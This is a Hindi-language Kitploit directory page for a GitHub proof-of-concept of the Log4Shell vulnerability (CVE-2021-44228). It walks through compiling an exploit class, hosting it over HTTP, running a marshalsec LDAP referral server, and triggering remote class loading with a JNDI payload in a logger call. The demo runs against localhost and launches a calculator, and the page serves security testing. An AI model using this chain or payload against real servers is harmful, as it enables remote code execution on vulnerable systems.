Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-Log4Shell-POC — Proof-of-concept for Log4Shell (CVE-2021-44228) demonstrating JNDI-based remote code execution via LDAP and HTTP servers. | Kitploit
उपकरण/GitHubGitHub/coldfusionx/cve-2021-44228-log4shell-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubcoldfusionx/cve-2021-44228-log4shell-poc

CVE-2021-44228-Log4Shell-POC

Proof-of-concept for Log4Shell (CVE-2021-44228) demonstrating JNDI-based remote code execution via LDAP and HTTP servers.

रिपॉजिटरी देखें
2164 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228-Log4Shell-POC

प्रसिद्ध Log4j CVE-2021-44228 के लिए संपूर्ण POC

पूर्वापेक्षाएँ

  • Java को यहाँ से डाउनलोड और इंस्टॉल करें, आप jdk-8u181 का उपयोग कर सकते हैं।
  • IntelliJ Idea को यहाँ से इंस्टॉल करें।

POC

  • चरण 1 : इस रिपॉजिटरी को क्लोन करें।
  • चरण 2 : Exploit.java फ़ाइल को किसी अलग फ़ोल्डर में ले जाएँ। जैसे मेरे मामले में मैंने होम डायरेक्टरी के अंदर rce नामक एक फ़ोल्डर बनाया है। /home/coldfusionx/rce

mov

  • चरण 3 : Exploit.java पर एक नज़र डालें यहाँ आप रिमोट कोड को कुछ भी बदल सकते हैं, इस मामले में यह ubuntu मशीन पर gnome-calculator पॉप अप करेगा।

exp

  • चरण 4 : इसके बाद हमें कमांड javac Exploit.java का उपयोग करके Exploit.java को कंपाइल करना होगा, एक बार सफलतापूर्वक कंपाइल हो जाने पर हमें एक नई फ़ाइल Exploit.class बनती हुई दिखनी चाहिए।

com

  • चरण 5 : Exploit.class को होस्ट करने के लिए python3 -m http.server 8888 का उपयोग करके एक python http सर्वर शुरू करें, वैकल्पिक रूप से आप कमांड php -S 127.0.0.1:8888 का उपयोग करके php सर्वर का भी उपयोग कर सकते हैं।

sv

  • चरण 6 : प्रोजेक्ट फ़ाइलों को IntelliJ Idea में लोड करें और maven को फ़ाइल इंडेक्सिंग पूरी करने दें। पूरा होने के बाद आपका प्रोजेक्ट इस तरह दिखना चाहिए :

poc1

  • चरण 7 : प्रोजेक्ट चलाने के लिए, हमें एक कॉन्फ़िगरेशन बनाने की आवश्यकता है, Add Configuration पर क्लिक करें

poc2

1. `Application` चुनें

poc3

2. मुख्य क्लास चुनें

main

3. JDK चुनें और apply करें।

poc4

4. आपको Log4j Applicaton बना हुआ दिखना चाहिए, चलाने के लिए तैयार।

poc5

  • चरण 8 : इसके बाद हम marshalsec का उपयोग करके LDAPRefServer शुरू करते हैं :
  • cd marshasec
  • LDAP सर्वर शुरू करने के लिए java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" चलाएँ, यहाँ 127.0.0.1:8888 वह python सर्वर है जो Exploit.class होस्ट कर रहा है इसलिए हम /#Exploit निर्दिष्ट करते हैं

ldap

  • चरण 9 : अपनी आवश्यकता के अनुसार log4j.java में JNDI पेलोड संपादित करें, logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); इस मामले में हम रिमोट क्लास Exploit लोड कर रहे हैं, LDAP रेफरर सर्वर अनुरोध को हमारे python सर्वर पर रीडायरेक्ट करेगा जो दुर्भावनापूर्ण Exploit क्लास होस्ट कर रहा है।

  • चरण 10 : Log4j चलाएँ, सफल रन पर आपको gnome कैलकुलेटर पॉप अप होता हुआ दिखना चाहिए।

rce

Log4Shell CVE-2021-44228 पर मेरा विस्तृत विश्लेषण देखें

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2021-44228
टूल डाउनलोड करें